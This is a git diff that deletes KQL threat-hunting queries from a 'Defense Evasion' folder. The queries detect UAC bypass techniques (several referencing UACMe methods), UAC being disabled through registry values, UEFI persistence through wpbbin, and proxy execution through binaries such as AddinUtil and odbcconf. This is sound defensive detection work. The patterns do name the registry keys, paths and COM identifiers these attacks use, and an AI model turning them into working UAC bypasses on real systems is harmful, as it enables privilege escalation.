-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath endswith "\\werfault.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\consent.exe"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_Disk_Cleanup.kql b/Defense Evasion/UAC_Bypass_Using_Disk_Cleanup.kql
deleted file mode 100644
index 949e3b2b..00000000
--- a/Defense Evasion/UAC_Bypass_Using_Disk_Cleanup.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where ProcessCommandLine endswith "\"\\system32\\cleanmgr.exe /autoclean /d C:" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine =~ "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_DismHost.kql b/Defense Evasion/UAC_Bypass_Using_DismHost.kql
deleted file mode 100644
index 63f130be..00000000
--- a/Defense Evasion/UAC_Bypass_Using_DismHost.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (ProcessIntegrityLevel in~ ("High", "System")) and (InitiatingProcessFolderPath contains "C:\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath contains "\\DismHost.exe")
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_EventVwr.kql b/Defense Evasion/UAC_Bypass_Using_EventVwr.kql
deleted file mode 100644
index 3043fd99..00000000
--- a/Defense Evasion/UAC_Bypass_Using_EventVwr.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)
-// Date: 2022/04/27
-// Level: high
-// Description: Detects the pattern of a UAC bypass using Windows Event Viewer
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceFileEvents
-| where (FolderPath endswith "\\Microsoft\\Event Viewer\\RecentViews" or FolderPath endswith "\\Microsoft\\EventV~1\\RecentViews") and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_Event_Viewer_RecentViews.kql b/Defense Evasion/UAC_Bypass_Using_Event_Viewer_RecentViews.kql
deleted file mode 100644
index 974b22fe..00000000
--- a/Defense Evasion/UAC_Bypass_Using_Event_Viewer_RecentViews.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/11/22
-// Level: high
-// Description: Detects the pattern of UAC Bypass using Event Viewer RecentViews
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\Event Viewer\\RecentViews" or ProcessCommandLine contains "\\EventV~1\\RecentViews") and ProcessCommandLine contains ">"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_IDiagnostic_Profile.kql b/Defense Evasion/UAC_Bypass_Using_IDiagnostic_Profile.kql
deleted file mode 100644
index 26df3a86..00000000
--- a/Defense Evasion/UAC_Bypass_Using_IDiagnostic_Profile.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/03
-// Level: high
-// Description: Detects the "IDiagnosticProfileUAC" UAC bypass technique
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine contains " /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}" and InitiatingProcessFolderPath endswith "\\DllHost.exe"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql b/Defense Evasion/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql
deleted file mode 100644
index 25b12cc5..00000000
--- a/Defense Evasion/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/03
-// Level: high
-// Description: Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\DllHost.exe" and FolderPath endswith ".dll" and FolderPath startswith "C:\\Windows\\System32\\"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_IEInstal_-_File.kql b/Defense Evasion/UAC_Bypass_Using_IEInstal_-_File.kql
deleted file mode 100644
index 1ca85fad..00000000
--- a/Defense Evasion/UAC_Bypass_Using_IEInstal_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where InitiatingProcessFolderPath =~ "C:\\Program Files\\Internet Explorer\\IEInstal.exe" and FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "consent.exe" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_IEInstal_-_Process.kql b/Defense Evasion/UAC_Bypass_Using_IEInstal_-_Process.kql
deleted file mode 100644
index eaf21560..00000000
--- a/Defense Evasion/UAC_Bypass_Using_IEInstal_-_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "consent.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\ieinstal.exe"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_Iscsicpl_-_ImageLoad.kql b/Defense Evasion/UAC_Bypass_Using_Iscsicpl_-_ImageLoad.kql
deleted file mode 100644
index 7d63fa2a..00000000
--- a/Defense Evasion/UAC_Bypass_Using_Iscsicpl_-_ImageLoad.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/17
-// Level: high
-// Description: Detects the "iscsicpl.exe" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceImageLoadEvents
-| where (InitiatingProcessFolderPath =~ "C:\\Windows\\SysWOW64\\iscsicpl.exe" and FolderPath endswith "\\iscsiexe.dll") and (not((FolderPath contains "C:\\Windows\\" and FolderPath contains "iscsiexe.dll")))
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_MSConfig_Token_Modification_-_File.kql b/Defense Evasion/UAC_Bypass_Using_MSConfig_Token_Modification_-_File.kql
deleted file mode 100644
index cadc4f08..00000000
--- a/Defense Evasion/UAC_Bypass_Using_MSConfig_Token_Modification_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where FolderPath endswith "\\AppData\\Local\\Temp\\pkgmgr.exe" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_MSConfig_Token_Modification_-_Process.kql b/Defense Evasion/UAC_Bypass_Using_MSConfig_Token_Modification_-_Process.kql
deleted file mode 100644
index ebc4f60d..00000000
--- a/Defense Evasion/UAC_Bypass_Using_MSConfig_Token_Modification_-_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where ProcessCommandLine =~ "\"C:\\Windows\\system32\\msconfig.exe\" -5" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\pkgmgr.exe"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_NTFS_Reparse_Point_-_File.kql b/Defense Evasion/UAC_Bypass_Using_NTFS_Reparse_Point_-_File.kql
deleted file mode 100644
index 79b84858..00000000
--- a/Defense Evasion/UAC_Bypass_Using_NTFS_Reparse_Point_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where FolderPath endswith "\\AppData\\Local\\Temp\\api-ms-win-core-kernel32-legacy-l1.DLL" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_NTFS_Reparse_Point_-_Process.kql b/Defense Evasion/UAC_Bypass_Using_NTFS_Reparse_Point_-_Process.kql
deleted file mode 100644
index a2dfe81e..00000000
--- a/Defense Evasion/UAC_Bypass_Using_NTFS_Reparse_Point_-_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (ProcessCommandLine endswith "\\AppData\\Local\\Temp\\update.msu" and ProcessCommandLine startswith "\"C:\\Windows\\system32\\wusa.exe\" /quiet C:\\Users\\" and (ProcessIntegrityLevel in~ ("High", "System"))) or ((ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Temp\\" and ProcessCommandLine contains "\\dismhost.exe {") and FolderPath endswith "\\DismHost.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine =~ "\"C:\\Windows\\system32\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\Windows\\system32\\pe386\" /ignorecheck")
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_PkgMgr_and_DISM.kql b/Defense Evasion/UAC_Bypass_Using_PkgMgr_and_DISM.kql
deleted file mode 100644
index 594500b1..00000000
--- a/Defense Evasion/UAC_Bypass_Using_PkgMgr_and_DISM.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath endswith "\\dism.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\pkgmgr.exe"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_File.kql b/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_File.kql
deleted file mode 100644
index ef7a7239..00000000
--- a/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where (FolderPath endswith "\\AppData\\Local\\Temp\\OskSupport.dll" and FolderPath startswith "C:\\Users\\") or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\DllHost.exe" and FolderPath =~ "C:\\Program Files\\Windows Media Player\\osk.exe")
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_Process.kql b/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_Process.kql
deleted file mode 100644
index 96f8c1bd..00000000
--- a/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (FolderPath =~ "C:\\Program Files\\Windows Media Player\\osk.exe" and (ProcessIntegrityLevel in~ ("High", "System"))) or (FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine =~ "\"C:\\Windows\\system32\\mmc.exe\" \"C:\\Windows\\system32\\eventvwr.msc\" /s")
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_Registry.kql b/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_Registry.kql
deleted file mode 100644
index dc52850a..00000000
--- a/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData =~ "Binary Data" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Compatibility Assistant\\Store\\C:\\Program Files\\Windows Media Player\\osk.exe"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Via_Wsreset.kql b/Defense Evasion/UAC_Bypass_Via_Wsreset.kql
deleted file mode 100644
index 7ddbf642..00000000
--- a/Defense Evasion/UAC_Bypass_Via_Wsreset.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: oscd.community, Dmitry Uchakin
-// Date: 2020/10/07
-// Level: high
-// Description: Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryKey endswith "\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_WSReset.kql b/Defense Evasion/UAC_Bypass_WSReset.kql
deleted file mode 100644
index b39549cb..00000000
--- a/Defense Evasion/UAC_Bypass_WSReset.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath endswith "\\wsreset.exe" and (ProcessIntegrityLevel in~ ("High", "System"))
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_With_Fake_DLL.kql b/Defense Evasion/UAC_Bypass_With_Fake_DLL.kql
deleted file mode 100644
index ea6ebd96..00000000
--- a/Defense Evasion/UAC_Bypass_With_Fake_DLL.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: oscd.community, Dmitry Uchakin
-// Date: 2020/10/06
-// Level: high
-// Description: Attempts to load dismcore.dll after dropping it
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\dismcore.dll" and InitiatingProcessFolderPath endswith "\\dism.exe") and (not(FolderPath =~ "C:\\Windows\\System32\\Dism\\dismcore.dll"))
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_via_Event_Viewer.kql b/Defense Evasion/UAC_Bypass_via_Event_Viewer.kql
deleted file mode 100644
index c13ab477..00000000
--- a/Defense Evasion/UAC_Bypass_via_Event_Viewer.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017/03/19
-// Level: high
-// Description: Detects UAC bypass method using Windows event viewer
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, car.2019-04-001
-DeviceRegistryEvents
-| where RegistryKey endswith "\\mscfile\\shell\\open\\command"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_via_ICMLuaUtil.kql b/Defense Evasion/UAC_Bypass_via_ICMLuaUtil.kql
deleted file mode 100644
index e6a2379f..00000000
--- a/Defense Evasion/UAC_Bypass_via_ICMLuaUtil.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Elastic (idea)
-// Date: 2022/09/13
-// Level: high
-// Description: Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where ((InitiatingProcessCommandLine contains "/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" or InitiatingProcessCommandLine contains "/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}") and InitiatingProcessFolderPath endswith "\\dllhost.exe") and (not((FolderPath endswith "\\WerFault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_via_Sdclt.kql b/Defense Evasion/UAC_Bypass_via_Sdclt.kql
deleted file mode 100644
index 62170641..00000000
--- a/Defense Evasion/UAC_Bypass_via_Sdclt.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Omer Yampel, Christian Burkard (Nextron Systems)
-// Date: 2017/03/17
-// Level: high
-// Description: Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, car.2019-04-001
-DeviceRegistryEvents
-| where RegistryKey endswith "Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand" or (RegistryValueData matches regex "-1[0-9]{3}\\\\Software\\\\Classes\\\\" and RegistryKey endswith "Software\\Classes\\Folder\\shell\\open\\command\\SymbolicLinkValue")
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Disabled.kql b/Defense Evasion/UAC_Disabled.kql
deleted file mode 100644
index 0ee19c33..00000000
--- a/Defense Evasion/UAC_Disabled.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: frack113
-// Date: 2022/01/05
-// Level: medium
-// Description: Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0.
-
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Notification_Disabled.kql b/Defense Evasion/UAC_Notification_Disabled.kql
deleted file mode 100644
index 0c9d6980..00000000
--- a/Defense Evasion/UAC_Notification_Disabled.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/05/10
-// Level: medium
-// Description: Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value.
-UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users.
-When "UACDisableNotify" is set to 1, UAC prompts are suppressed.
-
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Microsoft\\Security Center\\UACDisableNotify"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Secure_Desktop_Prompt_Disabled.kql b/Defense Evasion/UAC_Secure_Desktop_Prompt_Disabled.kql
deleted file mode 100644
index 684fe543..00000000
--- a/Defense Evasion/UAC_Secure_Desktop_Prompt_Disabled.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2024/05/10
-// Level: medium
-// Description: Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value.
-The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts.
-When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software.
-
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\PromptOnSecureDesktop"
\ No newline at end of file
diff --git a/Defense Evasion/UEFI_Persistence_Via_Wpbbin_-_FileCreation.kql b/Defense Evasion/UEFI_Persistence_Via_Wpbbin_-_FileCreation.kql
deleted file mode 100644
index b24cd1fc..00000000
--- a/Defense Evasion/UEFI_Persistence_Via_Wpbbin_-_FileCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/18
-// Level: high
-// Description: Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory. Which could be indicative of UEFI based persistence method
-// Tags: attack.persistence, attack.defense_evasion, attack.t1542.001
-DeviceFileEvents
-| where FolderPath =~ "C:\\Windows\\System32\\wpbbin.exe"
\ No newline at end of file
diff --git a/Defense Evasion/UEFI_Persistence_Via_Wpbbin_-_ProcessCreation.kql b/Defense Evasion/UEFI_Persistence_Via_Wpbbin_-_ProcessCreation.kql
deleted file mode 100644
index dba934a8..00000000
--- a/Defense Evasion/UEFI_Persistence_Via_Wpbbin_-_ProcessCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/18
-// Level: high
-// Description: Detects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section
-// Tags: attack.persistence, attack.defense_evasion, attack.t1542.001
-DeviceProcessEvents
-| where FolderPath =~ "C:\\Windows\\System32\\wpbbin.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon_AddinUtil.EXE_CommandLine_Execution.kql b/Defense Evasion/Uncommon_AddinUtil.EXE_CommandLine_Execution.kql
deleted file mode 100644
index 6ef2677f..00000000
--- a/Defense Evasion/Uncommon_AddinUtil.EXE_CommandLine_Execution.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
-// Date: 2023/09/18
-// Level: medium
-// Description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-AddInRoot:" or ProcessCommandLine contains "-PipelineRoot:") and (FolderPath endswith "\\addinutil.exe" or ProcessVersionInfoOriginalFileName =~ "AddInUtil.exe")) and (not((ProcessCommandLine contains "-AddInRoot:\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA" or ProcessCommandLine contains "-AddInRoot:C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA" or ProcessCommandLine contains "-PipelineRoot:\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA" or ProcessCommandLine contains "-PipelineRoot:C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA")))
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon_Child_Process_Of_AddinUtil.EXE.kql b/Defense Evasion/Uncommon_Child_Process_Of_AddinUtil.EXE.kql
deleted file mode 100644
index 6ee88ff8..00000000
--- a/Defense Evasion/Uncommon_Child_Process_Of_AddinUtil.EXE.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
-// Date: 2023/09/18
-// Level: medium
-// Description: Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload.
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\addinutil.exe" and (not((FolderPath endswith ":\\Windows\\System32\\conhost.exe" or FolderPath endswith ":\\Windows\\System32\\werfault.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\werfault.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon_Child_Process_Of_Appvlp.EXE.kql b/Defense Evasion/Uncommon_Child_Process_Of_Appvlp.EXE.kql
deleted file mode 100644
index b28bbd12..00000000
--- a/Defense Evasion/Uncommon_Child_Process_Of_Appvlp.EXE.kql
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: Sreeman
-// Date: 2020/03/13
-// Level: medium
-// Description: Detects uncommon child processes of Appvlp.EXE
-Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands.
-Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder
-or to mark a file as a system file.
-
-// Tags: attack.t1218, attack.defense_evasion, attack.execution
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\appvlp.exe" and (not((FolderPath endswith ":\\Windows\\SysWOW64\\rundll32.exe" or FolderPath endswith ":\\Windows\\System32\\rundll32.exe"))) and (not(((FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath endswith "\\msoasb.exe") or (FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath endswith "\\MSOUC.EXE") or ((FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath contains "\\SkypeSrv\\") and FolderPath endswith "\\SKYPESERVER.EXE"))))
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon_Child_Process_Of_BgInfo.EXE.kql b/Defense Evasion/Uncommon_Child_Process_Of_BgInfo.EXE.kql
deleted file mode 100644
index 77dfd04d..00000000
--- a/Defense Evasion/Uncommon_Child_Process_Of_BgInfo.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community
-// Date: 2019/10/26
-// Level: medium
-// Description: Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
-// Tags: attack.execution, attack.t1059.005, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\bginfo.exe" or InitiatingProcessFolderPath endswith "\\bginfo64.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon_Child_Process_Of_Defaultpack.EXE.kql b/Defense Evasion/Uncommon_Child_Process_Of_Defaultpack.EXE.kql
deleted file mode 100644
index 43fcebb7..00000000
--- a/Defense Evasion/Uncommon_Child_Process_Of_Defaultpack.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/31
-// Level: medium
-// Description: Detects uncommon child processes of "DefaultPack.EXE" binary as a proxy to launch other programs
-// Tags: attack.t1218, attack.defense_evasion, attack.execution
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\DefaultPack.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon_Child_Process_Spawned_By_Odbcconf.EXE.kql b/Defense Evasion/Uncommon_Child_Process_Spawned_By_Odbcconf.EXE.kql
deleted file mode 100644
index 0ea3864c..00000000
--- a/Defense Evasion/Uncommon_Child_Process_Spawned_By_Odbcconf.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Harjot Singh @cyb3rjy0t
-// Date: 2023/05/22
-// Level: medium
-// Description: Detects an uncommon child process of "odbcconf.exe" binary which normally shouldn't have any child processes.
-// Tags: attack.defense_evasion, attack.t1218.008
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\odbcconf.exe"
\ No newline at end of file
